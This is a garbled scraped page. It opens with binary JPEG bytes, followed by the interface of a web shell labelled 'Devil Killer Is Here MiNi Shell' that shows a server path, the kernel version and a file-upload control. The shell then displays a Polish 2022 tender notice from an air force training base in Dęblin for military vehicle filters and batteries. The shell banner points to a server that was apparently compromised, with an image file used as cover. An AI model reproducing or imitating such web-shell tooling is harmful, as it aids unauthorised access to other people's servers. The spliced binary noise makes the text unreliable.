JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220303/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220303/0007436202-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa filtrów, akumulatorów i części zamiennych do wojskowych pojazdów mechanicznych. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">41. Baza Lotnictwa Szkolnego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 061456920</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Brygady Pościgowej 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dęblin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">08-521</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">41blsz.przetargi@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.41blsz.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa filtrów, akumulatorów i części zamiennych do wojskowych pojazdów mechanicznych. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a17c069a-9a25-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00074362</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00041860/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Części dopojazdów, akcesoria samochodowe i motocyklowe, chemia samochodowa, akumulatory, ogumienie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/41blsz/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Postępowanie prowadzone jest w języku polskim przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002r o świadczeniu usług drogą elektroniczną (tj. Dz. U. z 2020r, poz. 344) za pośrednictwem Platformy Zakupowej pod adresem: https://platformazakupowa.pl/pn/41blsz/proceedings.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">16.	Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) - określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.:<br/>a)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b)	komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>c)	zainstalowana dowolna przeglądarka internetowa; w przypadku Internet Explorer minimalnie wersja 10.0.;<br/>d)	włączona obsługa JavaScript;<br/>e)	zainstalowany program Adobe Acrobat Reader, lub inny obsługujący format plików .pdf.;<br/>f)	platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8;<br/>g)	oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/><br/>- administratorem Pani/Pana danych osobowych jest:<br/><br/>41. Baza Lotnictwa Szkolnego w Dęblinie<br/>ul. Brygady Pościgowej 5<br/>08 – 521 Dęblin,<br/>NIP:506-011-18-75, <br/>REGON: 061456920<br/>kontakt: tel. 261 517 525 <br/>e-mail: 41blsz.przetargi@ron.mil.pl<br/><br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego: przeprowadzonego w trybie podstawowym bez możliwości negocjacji tj: dotyczącego „Dostawa filtrów, akumulatorów i części zamiennych do wojskowych pojazdów mechanicznych” SPRAWA 7/22/P<br/><br/>Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 19 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019), dalej „ustawa Pzp”; <br/><br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, <br/>a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa <br/>w art. 18 ust. 2 RODO **; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO<br/><br/>*Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy <br/>w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/><br/>***Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania <br/>w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W przypadku korzystania przez osobę, której dane<br/>osobowe są przetwarzane przez zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3<br/>rozporządzenia 2016/679, zamawiający może żądać od osoby występującej z żądaniem wskazania<br/>dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania<br/>o udzielenie zamówienia. Skorzystanie przez osobę, której dane osobowe są przetwarzane, z<br/>uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16<br/>rozporządzenia 2016/679, nie może naruszać integralności protokołu postępowania oraz jego<br/>załączników.<br/>f) Pani/Pana dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia; a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy;<br/>g) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>h) posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*,<br/>* skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą<br/>Pzp oraz nie może naruszać integralności protokołu oraz jego załączników<br/>Zgodnie z art. 19 ust. 2 ustawy Pzp skorzystanie przez osobę, której dane osobowe dotyczą, z<br/>uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">7/22/P</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 136425,00 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 110914,63 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa filtrów do wojskowych pojazdów mechanicznych.<br/>1)	Przedmiotem zamówienia jest dostawa filtrów w ilościach i asortymencie określonym w Formularzu ofertowym załącznik nr 1 do SWZ.<br/>2)	Filtry powinny być fabrycznie nowe, w opakowaniach producenta, wolne od wad technicznych, wysokiej jakości, odpowiadające swemu przeznaczeniu oraz zgodne z parametrami określonymi przez producentów pojazdów. <br/>3)	Zamawiający wymaga aby wymieniony towar był objęty gwarancją wystawioną przez producenta liczoną od daty odbioru dostawy filtrów do siedziby wykonawcy. <br/>4)	W związku ze specyfiką rynku filtrów samochodowych (paliwa, oleju, itp.) gdzie funkcjonuje bardzo wielu producentów w/w asortymentu (zamienniki), a każdy z nich posługuje się swoim oznaczeniem katalogowym w SWZ wskazano nr kat. filtrów używanych dotychczas w SpW Służby czołg-sam. Wskazanie nr kat. służy jedynie określeniu parametrów technicznych, standardów, właściwości, jakości, funkcji, jakim powinien charakteryzować się przedmiot zamówienia, zastosowanym w celu ułatwienie identyfikacji pożądanego asortymentu przez potencjalnych wykonawców. Zamawiający dopuszcza dostarczenie produktów równoważnych (zamienników, tj. filtrów różnych producentów, o innych oznaczeniach katalogowych, pod warunkiem zachowania parametrów i wymogów dla danego produktu oraz zapewnienia kompatybilności i prawidłowego działania w pojazdach, w których będą montowane), wówczas na Wykonawcy leży obowiązek zaoferowania produktów spełniających wymagania określone przez Zamawiającego, tj. produktów o właściwościach zbliżonych, nadających się funkcjonalnie do zapotrzebowanego zastosowania. <br/>W przypadku zaoferowania filtrów będących zamiennikami wskazanych w SWZ Zamawiający zastrzega sobie prawo do porównania zaoferowanego produktu ze wskazanym (celem weryfikacji) poprzez np.: porównanie wymiarów (zaoferowane filtry nie mogą odbiegać od parametrów wskazanych w SWZ, tj. wysokość, średnica zew./wew., wymiar gwintu, itp.,), oraz poprzez bazę nr OEM. <br/>5)	Użyte przez Zamawiającego w specyfikacji asortymentowej (w formularzu ofertowym – załączniku Nr 1 do SWZ) numery katalogowe wskazują wyłącznie na standard funkcjonalno–użytkowy i jakościowy wymagany dla niektórych wyrobów.<br/>Zamawiający dopuszcza możliwość dostarczenia asortymentu równoważnego (zamienników), kompatybilnego ze sprzętem, dla którego jest on przeznaczony tzn.:<br/>a)	podobnych parametrach jakościowych (wyroby nowe, nieregenerowane, nienaprawiane, wolne od wad)<br/>b)	o takich samych parametrach technicznych (wymiary, kompatybilność)<br/>c)	o nie gorszych parametrach funkcjonalno-użytkowych, niż parametry wyrobów oznaczonych poszczególnymi numerami katalogowymi.<br/><br/>6)	Dostarczony asortyment musi posiadać dokumentację w języku polskim.<br/>7)	Dostawa części zamiennych powinna być dokonana do miejsca wskazanego przez Zamawiającego – magazynu czołgowo-samochodowego, znajdującego się na terenie 41 Bazy Lotnictwa Szkolnego w Dęblinie w dni robocze od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy w godz. 8:00 – 15:00, w cenie zgodnej z ofertą cenową ujętą przez Wykonawcę w formularzu cenowym. <br/>8)	Dostawa nastąpi na koszt Wykonawcy. O dokładnym terminie dostawy Wykonawca powiadomi Zamawiającego z wyprzedzeniem co najmniej jednodniowym w kontaktach roboczych (telefonicznie numer telefonu 261 518 815 lub 261 517 883).<br/>9)	Wykonawca zobowiązuje się dostarczyć Zamawiającemu filtry do pojazdów wojskowych wymienione w Formularzu ofertowym, stanowiącym załącznik nr 1 do SWZ w terminie 10 dni roboczych od dnia zawarcia umowy ( od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy).<br/><br/>Filtry oleju - 42913300-2<br/>Filtry wlotu oleju, paliwa i powietrza- 42913000-9<br/>Filtry paliwa - 42913400-3 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 51318 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42913300-2 - Filtry oleju</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">42913000-9 - Filtry wlotu oleju, paliwa i powietrza</p> <p class="mb-0">42913400-3 - Filtry paliwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryteriami i ich znaczeniem (wagą): <br/><br/>X - cena brutto oferty – waga 100% <br/><br/>X = (Cn : Cb) x 100 x 100% (ilość punktów) <br/><br/>gdzie <br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty” <br/>Cn– najniższe całkowite wynagrodzenie brutto w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 8 Tabeli Nr 1 Formularza ofertowego <br/>Cb – całkowite wynagrodzenie brutto w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 8 Tabeli Nr 1 Formularza ofertowego</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa akumulatorów kwasowo-ołowiowych.<br/><br/>1)	Przedmiotem zamówienia jest dostawa akumulatorów w ilościach i asortymencie określonym w Formularzu ofertowym załącznik nr 1 do SWZ.<br/>2)	Akumulatory powinny być fabrycznie nowe, być dostarczone w gatunku I (pierwszym). <br/>3)	Dostarczony asortyment musi być fabrycznie nowy, nieużywany, w I kategorii oraz spełniać wszystkie wymagania określone w SWZ. <br/>4)	Nie dopuszcza się zaproponowania akumulatorów o parametrach technicznych wykraczających poza określone wielkości graniczne podane w Formularzu ofertowym załącznik nr 1 do SWZ w części dotyczącej pojemności akumulatorów. <br/>5)	Dopuszcza się możliwość zaproponowania akumulatorów o parametrach technicznych wyższych niż podane SWZ w części dotyczącej prądu rozruchowego.<br/>6)	Oferowany do dostawy asortyment musi spełniać normę: PN-EN 50342-1:2016 lub równoważną. <br/>7)	Na oferowany asortyment Wykonawca udziela minimum 24 miesięcznej gwarancji.<br/>8)	Akumulatory winny być dostarczone wraz z indywidualnymi kartami gwarancyjnymi z informacją o warunkach udzielonej gwarancji oraz o sposobie postępowania w przypadku konieczności zastosowania procedury gwarancyjnej. Karty gwarancyjne kompletne i wypełnione powinny być dostarczone najpóźniej w dzień dostawy.<br/>9)	Dostawa akumulatorów powinna być dokonana do miejsca wskazanego przez Zamawiającego – magazynu czołgowo-samochodowego, znajdującego się na terenie 41 Bazy Lotnictwa Szkolnego w Dęblinie w dni robocze od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy, w godz. 8:00 – 15:00, w cenie zgodnej z ofertą cenową ujętą przez Wykonawcę w formularzu cenowym. Dostawa nastąpi na koszt Wykonawcy. O dokładnym terminie dostawy Wykonawca powiadomi Zamawiającego w kontaktach roboczych (telefonicznie numer telefonu 261 518 815 lub 261 517 883). <br/>10)	Wykonawca zobowiązuje się dostarczyć Zamawiającemu akumulatory samochodowe wymienione w Formularzu ofertowym, stanowiącym załącznik nr 1 do SWZ w terminie 10 dni roboczych od dnia zawarcia umowy ( od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy).<br/><br/>31431000-6 akumulatory kwasowo- ołowiowe </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 4720 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31431000-6 - Akumulatory ołowiowo-kwasowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryteriami i ich znaczeniem (wagą): <br/><br/>X - cena brutto oferty – waga 100% <br/><br/>X = (Cn : Cb) x 100 x 100% (ilość punktów) <br/><br/>gdzie <br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty” <br/>Cn– najniższe całkowite wynagrodzenie brutto w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 8 Tabeli Nr 1 Formularza ofertowego <br/>Cb – całkowite wynagrodzenie brutto w zakresie poszczególnych zadań wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 8 Tabeli Nr 1 Formularza ofertowego</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> 